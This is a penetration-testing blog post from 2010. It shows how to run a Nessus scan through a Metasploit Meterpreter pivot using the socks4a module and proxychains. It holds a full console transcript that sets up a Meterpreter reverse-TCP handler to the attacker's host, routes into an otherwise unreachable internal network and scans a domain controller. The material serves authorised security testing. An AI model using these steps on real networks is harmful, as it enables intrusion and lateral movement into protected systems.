Nessus Through SOCKS Through Meterpreter
Sunday 24th Oct 10
Earlier this year Mark Baggett wrote an article on running a Nessus scan through Meterpreter. It involved installing an SSH server on the compromised machine and then using it as a SOCKS4 proxy to forward the scan traffic through to the target machine (Nessus Scanning through a Metasploit Meterpreter Session). It was a great idea but I don't like installing tools on clients machines if I can avoid it so never got round to doing it on a test.
Recently Zate Berg added the Nessus plug-in to Metasploit to let you control a Nessus server from the Metasploit command line. Without thinking it through my initial reaction was "Great I can now scan through a Meterpreter pivot". Once I thought about it and read Carlos's article New Nessus Plug-In For Metasploit I realised that the Nessus server was still running on the attacker machine and so didn't have access to the tunnel.
After asking a few questions on various mailing lists egypt pointed me at the auxiliary/server/socks4a module which would allow me to do the same as the SSH server but without having to install anything on the compromised machine. After a bit of playing, some partially successful scans and more questions to the list I got a completed scan through a Meterpreter pivot. The key seems to be that you need to be running at least Ruby 1.9 (I'm running 1.9.1) not 1.8.7 as I originally tried, withouth it the proxy seems to get congested and locks up.
Below is a walk through of the steps I went through to get the scan. The actors in this play are:
- 192.168.0.2 - The attacking machine
- 10.1.1.5 - The compromised machine
- 10.1.1.2 - The machine I want to scan
There is no normal route from the 192 network into the 10 network, the router at 10.1.1.1 prevents this.
robin@attacker metasploit $ ./msfconsole ___________ < DigiNinja > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || =[ metasploit v3.5.1-dev [core:3.5 api:1.0] + -- --=[ 613 exploits - 309 auxiliary + -- --=[ 215 payloads - 27 encoders - 8 nops =[ svn r10774 updated today (2010.10.21) msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lport 31337 lport => 31337 msf exploit(handler) > set lhost 192.168.0.2 lhost => 192.168.0.2 msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on 192.168.0.2:31337 [*] Starting the payload handler... msf exploit(handler) > [*] Sending stage (749056 bytes) to 192.168.0.80 [*] Meterpreter session 1 opened (192.168.0.2:31337 -> 192.168.0.80:24592) at 2010-10-22 10:38:18 +0100 msf exploit(handler) > route add 10.1.1.0 255.255.255.0 1 msf exploit(handler) > use auxiliary/server/socks4a msf auxiliary(socks4a) > run [*] Auxiliary module execution completed [*] Starting the socks4a proxy server msf auxiliary(socks4a) >
Check the tunnel is working. I don't speak SMB but if you do this and see the OK then the connection has been made and you can just enter some rubbish and hit return a few times, the other end will drop the connection pretty quickly. Pick a port you know, or expect, to be open on the target machine, SMB is usually a good choice for a Windows box.
root@attacker sbin # proxychains nc 10.1.1.2 445 ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:1080-<><>-10.1.1.2:445-<><>-OK dummy...
Before you start Nessus with proxychains you'll need to modify the proxychains config (/etc/proxychains.conf). In my default config I needed to add the following line to the end.
socks4 127.0.0.1 1080
And now start Nessus
root@attacker sbin # proxychains ./nessus-service -D
Scans take a LONG time, with a default Nessus policy it took me 4242 seconds to scan the compromised machine, that is nearly an hour and a quarter so I've created a minimal policy to work with for this type of scanning. First we load the nessus module the connect to it, check the policies and finally fire off a scan.
msf auxiliary(socks4a) > load nessus [*] Nessus Bridge for Nessus 4.2.x [+] Type nessus_help for a command listing [*] Successfully loaded plugin: nessus msf auxiliary(socks4a) > nessus_connect robin@localhost [+] Password: ... [*] Connecting to https://localhost:8834/ as robin [*] Authenticated msf auxiliary(socks4a) > nessus_policy_list [+] Nessus Policy List ID Name Comments -- ---- -------- 4 Minimal MS 3 noping 2 Web 1 All msf auxiliary(socks4a) > nessus_scan_new 4 "Quick Windows" 10.1.1.2 [*] Creating scan from policy number 4, called "Quick Windows" and scanning 10.1.1.2 [*] Scan started. uid is 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee msf auxiliary(socks4a) > nessus_scan_status [+] Running Scans Scan ID Name Owner Started Status Current Hosts Total Hosts ------- ---- ----- ------- ------ ------------- ----------- 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee Quick Windows robin 12:39 Oct 22 2010 running 0 1 [*] You can: [+] Import Nessus report to database : nessus_report_get <reportid> [+] Pause a nessus scan : nessus_scan_pause <scanid>
Now sit back for a LONG wait. You can check the status with nessus_scan_status
msf auxiliary(socks4a) > nessus_scan_status [+] Running Scans Scan ID Name Owner Started Status Current Hosts Total Hosts ------- ---- ----- ------- ------ ------------- ----------- 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee Quick Windows robin 12:39 Oct 22 2010 running 0 1
When it finall finishes you can check the results and load them into your Metasploit database
msf auxiliary(socks4a) > db_connect msf.db [-] Note that sqlite is not supported due to numerous issues. [-] It may work, but don't count on it [*] Creating a new database file... [*] Successfully connected to the database [*] File: msf.db msf auxiliary(socks4a) > nessus_report_get 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee [*] importing 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee [*] 10.1.1.2 Done! [+] Done msf auxiliary(socks4a) > db_hosts Hosts ===== address address6 arch comm comments created_at info mac name os_flavor os_lang os_name os_sp purpose state updated_at svcs vulns workspace ------- -------- ---- ---- -------- ---------- ---- --- ---- --------- ------- ------- ----- ------- ----- ---------- ---- ----- --------- 10.1.1.2 2010-10-22 14:09:22 UTC 00:13:3b:04:03:52 CORP_DC alive 2010-10-22 14:09:22 UTC 5 6 default
So, there we have it, a full Nessus scan through a Meterpreter pivot with everything done in memory on the compromised machine. A very neat and tidy attack.